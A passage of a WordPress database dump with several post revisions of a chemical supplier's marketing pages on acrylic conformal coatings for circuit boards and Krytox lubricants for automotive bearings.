of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\n\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>', 'MS-465C', 'Miller-Stephenson&#039;s Acrylic Conformal Coating is a non-flammable, tough, fast drying, abrasion resistant coating providing protection against caustics and corrosives. The methacrylate copolymer resin offers excellent resistance to water, alcohol, dilute acids &amp; alkalis, chemical fumes and corrosive or oxidizing environments. It offers excellent weatherability and superior abrasion resistance. The resin water-white in color and transparency, with high gloss and hardness which is solderable for ease of repair.', 'inherit', 'closed', 'closed', '', '733-autosave-v1', '', '', '2016-10-11 14:43:02', '2016-10-11 14:43:02', '', 733, 'https://www.miller-stephenson.com/733-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2498, 3, '2016-10-11 14:48:41', '2016-10-11 14:48:41', 'Miller-Stephenson’s Acrylic Conformal Coating is a non-flammable, tough, fast drying, abrasion resistant coating providing protection against caustics and corrosives. The methacrylate copolymer resin offers excellent resistance to water, alcohol, dilute acids &amp; alkalis, chemical fumes and corrosive or oxidizing environments. It offers excellent weatherability and superior abrasion resistance. The resin water-white in color and transparency, with high gloss and hardness which is solderable for ease of repair.\n\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. Printed circuit boards covered with acrylic conformal coatings are repairable.  Simply heat the coating with a soldering iron to remove the components. Drying and curing of acrylic coating depends upon evaporation of the solvent.  Air dry coated boards for 30 minutes at 77°F/25°C to remove solvents before curing in oven or applying additional coats. The recommended cure time is 45 minutes at 167°F/75°C.  The alternate cure is 24 hours at 77°F/25°C. Acrylic coating will be tack free in one hour, semi-hard in four hours, and fully cured in 24 hours.  Deaeration is not recommended.\n\nAcrylic Conformal Coatings are probably the easiest coating to remove and repair. The coating can be removed completely or locally by using specifically designed stripping chemistries. The board can then be re-coated completely of just in area of the repair. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapours, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.\n\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>', 'MS-467C', 'Miller-Stephenson’s Acrylic Conformal Coating is a non-flammable, tough, fast drying, abrasion resistant coating providing protection against caustics and corrosives. The methacrylate copolymer resin offers excellent resistance to water, alcohol, dilute acids &amp; alkalis, chemical fumes and corrosive or oxidizing environments. It offers excellent weatherability and superior abrasion resistance. The resin water-white in color and transparency, with high gloss and hardness which is solderable for ease of repair.', 'inherit', 'closed', 'closed', '', '734-autosave-v1', '', '', '2016-10-11 14:48:41', '2016-10-11 14:48:41', '', 734, 'https://www.miller-stephenson.com/734-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2500, 3, '2016-10-11 14:54:54', '2016-10-11 14:54:54', '<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Conformal coatings</a> are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-11 14:54:54', '2016-10-11 14:54:54', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2501, 3, '2016-10-11 14:57:44', '2016-10-11 14:57:44', '<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Conformal coatings</a> are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-11 14:57:44', '2016-10-11 14:57:44', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2502, 3, '2016-10-11 14:58:18', '2016-10-11 14:58:18', '<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Conformal coatings</a> are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four classes of conformal coating to choose from:\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">Our entire line of conformal coatings can be found here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-11 14:58:18', '2016-10-11 14:58:18', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2503, 2, '2016-10-11 16:39:36', '2016-10-11 16:39:36', '<h1><strong>Krytox™ Automotive Bearing Lubrication Applications</strong></h1>\r\n<h4><strong>High Performance Lubricants That Work in Demanding Real-Life Applications</strong></h4>\r\nReliable high-performance fluoropolymer lubricants from Chemours can stand up to even extreme conditions. Krytox™ oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry. Superior product performance, lower overall maintenance systems cost, and a lower environmental footprint help to meet rising consumer expectations. For automotive manufacturers, this provides the opportunity to offer extended warranties and enjoy improved productivity through reduced component failure.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">Krytox™ oils and greases</a> are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 288°C (550 °F), and higher temperatures for shorter periods, depending on product grade limits. Krytox™ oils and greases are exceptionally safe, reliable, and offer environmental benefits as well as longer lubricant life. These oils and greases will not burn or support combustion, even in 100% liquid or gaseous oxygen, nor will they degrade or break down in the presence of aggressive chemicals. In automotive applications, Krytox™ oils and greases deliver low\r\ntemperature starting performance, while maintaining efficacy at higher temperatures. These oils and greases can increase service life of critical components, allowing them to run more quietly and last longer, for superior, reliable performance.\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™ Oils and Greases</a></td>\r\n<td style="text-align: center;" width="206">Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Temperature Range, °C (°F)</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">GPL 204</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">GPL 214</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">GPL 224</a>, GPL 294, GPL 2E4, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">XP2A4</a></td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">–51–179 (–60–354)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">AUT 2E45, AUT 2245, AUT 2045, AUT 2A45</a></td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">–40–200 (–40–392)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">GPL 205</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">GPL 215</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">GPL 225</a>, GPL 295, GPL 2E5, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">XP2A5</a></td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">–36–210 (–33–410)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Krytox™—Products for the Automotive Industry</strong></h4>\r\nSeveral grades of Krytox™ oil and grease are suitable for automotive use, depending on the application type and temperature range encountered. The table above lists the most common grades currently being used. More detailed data is available on the web at <a href="https://www.miller-stephenson.com/krytox/">www.miller-stephenson.com/krytox.</a> <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">Solutions for automotive industries can be found by clicking here.</a>\r\n\r\n<img class="size-medium wp-image-2504 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-bearing-lubrication-800x465.jpg" alt="automotive-bearing-lubrication" width="800" height="465" />\r\n\r\n<strong>Proven Applications</strong>\r\n\r\n<strong>Fan Clutch</strong>\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and high viscosity, providing long life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\n<strong>Alternator</strong>\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators and, hence, the bearings get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure. As the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation. This reduces the alternator’s performance and robs performance from the rest of the automobile. Perhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running.\r\n\r\nThe higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced and reliable, heat-stability and performance of Krytox™ greases.\r\n<h4><strong>Clutch Pilot Automotive Bearing</strong></h4>\r\nThe pilot bearings support the clutch-end of the transmission shaft. If the lubricant in the pilot bearing fails, the transmission itself will fail. Pilot bearings lubricated with Krytox™ high performance lubricants will last longer and perform better than those lubricated with other synthetic lubricants, due to the high-load capability and chemical inertness of Krytox™ products.\r\n<h4><strong>Cooling Fan</strong></h4>\r\nTo maximize performance, an automobile’s engine must run at its optimal temperature (typically around 93 °C [200 °F]), which is controlled by the cooling system. One component of the system is the cooling fan, which blows air through the radiator, removing excess heat. Failure in the cooling fan’s bearings leads to failure of the fan, which will eventually result in overheating of the engine. The sintered bearings used in cooling fans often fail in two ways: either the lubricant volatilizes, or it degrades through oxidation. The use of Krytox™ prevents both of these modes of failure, due to its low volatility and unsurpassed resistance to oxidation.\r\n<h4><strong>Heavy Duty Truck Automatic Clutch</strong></h4>\r\nIn many heavy duty trucks, the engines have a much lower rpm upper limit. In order to prevent the engine from being destroyed, an automatic clutch is used. When the set maximum rpm limit is reached, the automatic clutch disengages and notifies the driver to shift gears. This both prevents engine damage and increases ease of operation. The bearings present in the clutch are critical to its operation and must receive adequate lubrication in order to work properly. Lubricating with Krytox™ mid-range viscosity and low volatility lubricants reduces the chance that the bearings will fail with the frequent gear-shifting and high loads experienced throughout the extended driving life of these trucks.\r\n\r\nTo learn more about Krytox Automotive Non Bearing lubrication applications please <a href="https://www.miller-stephenson.com/krytox-automotive/">click here.</a>', 'Krytox Automotive Bearing Lubrication Applications', '', 'publish', 'closed', 'closed', '', 'krytox-automotive-bearing-lubrication', '', '', '2016-10-12 19:47:41', '2016-10-12 19:47:41', '', 0, 'https://www.miller-stephenson.com/?p=2503', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2504, 2, '2016-10-11 15:51:24', '2016-10-11 15:51:24', '', 'automotive-bearing-lubrication', '', 'inherit', 'closed', 'closed', '', 'automotive-bearing-lubrication', '', '', '2016-10-11 15:51:24', '2016-10-11 15:51:24', '', 2503, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-bearing-lubrication.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2505, 2, '2016-10-11 15:53:36', '2016-10-11 15:53:36', '', 'Automotive Bearing Lubrication', '', 'inherit', 'closed', 'closed', '', 'shutterstock_130196291', '', '', '2016-10-11 15:55:07', '2016-10-11 15:55:07', '', 2503, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_130196291.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2506, 2, '2016-10-11 16:39:36', '2016-10-11 16:39:36', '<strong>Krytox Automotive Bearing Lubrication Applications</strong>\r\n\r\n<strong>High Performance Lubricants That Work in Demanding Real-Life Applications</strong>\r\n\r\nReliable high-performance fluoropolymer lubricants from Chemours can stand up to even extreme conditions. Krytox™ oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry. Superior product performance, lower overall maintenance systems cost, and a lower environmental footprint help to meet rising consumer expectations. For automotive manufacturers, this provides the opportunity to offer extended warranties and enjoy improved productivity through reduced component failure.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">Krytox™ oils and greases</a> are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 288°C (550 °F), and higher temperatures for shorter periods, depending on product grade limits. Krytox™ oils and greases are exceptionally safe, reliable, and offer environmental benefits as well as longer lubricant life. These oils and greases will not burn or support combustion, even in 100% liquid or gaseous oxygen, nor will they degrade or break down in the presence of aggressive chemicals. In automotive applications, Krytox™ oils and greases deliver low\r\ntemperature starting performance, while maintaining efficacy at higher temperatures. These oils and greases can increase service life of critical components, allowing them to run more quietly and last longer, for superior, reliable performance.\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™ Oils and Greases</a></td>\r\n<td style="text-align: center;" width="206">Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Temperature Range, °C (°F)</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">GPL 204</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">GPL 214</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">GPL 224</a>, GPL 294, GPL 2E4, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">XP2A4</a></td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">–51–179 (–60–354)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">AUT 2E45, AUT 2245, AUT 2045, AUT 2A45</a></td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">–40–200 (–40–392)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">GPL 205</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">GPL 215</a>, <a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">GPL 225</a>, GPL 295, GPL 2E5, <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">XP2A5</a></td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">–36–210 (–33–410)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Krytox™—Products for the Automotive Industry</strong>\r\n\r\nSeveral grades of Krytox™ oil and grease are suitable for automotive use, depending on the application type and temperature range encountered. The table above lists the most common grades currently being used. More detailed data is available on the web at <a href="https://www.miller-stephenson.com/krytox/">www.miller-stephenson.com/krytox.</a> <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">Solutions for automotive industries can be found by clicking here.</a>\r\n\r\n<img class="size-medium wp-image-2504 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-bearing-lubrication-800x465.jpg" alt="automotive-bearing-lubrication" width="800" height="465" />\r\n\r\n<strong>Proven Applications</strong>\r\n\r\n<strong>Fan Clutch</strong>\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and high viscosity, providing long life and excellent lubrication to the 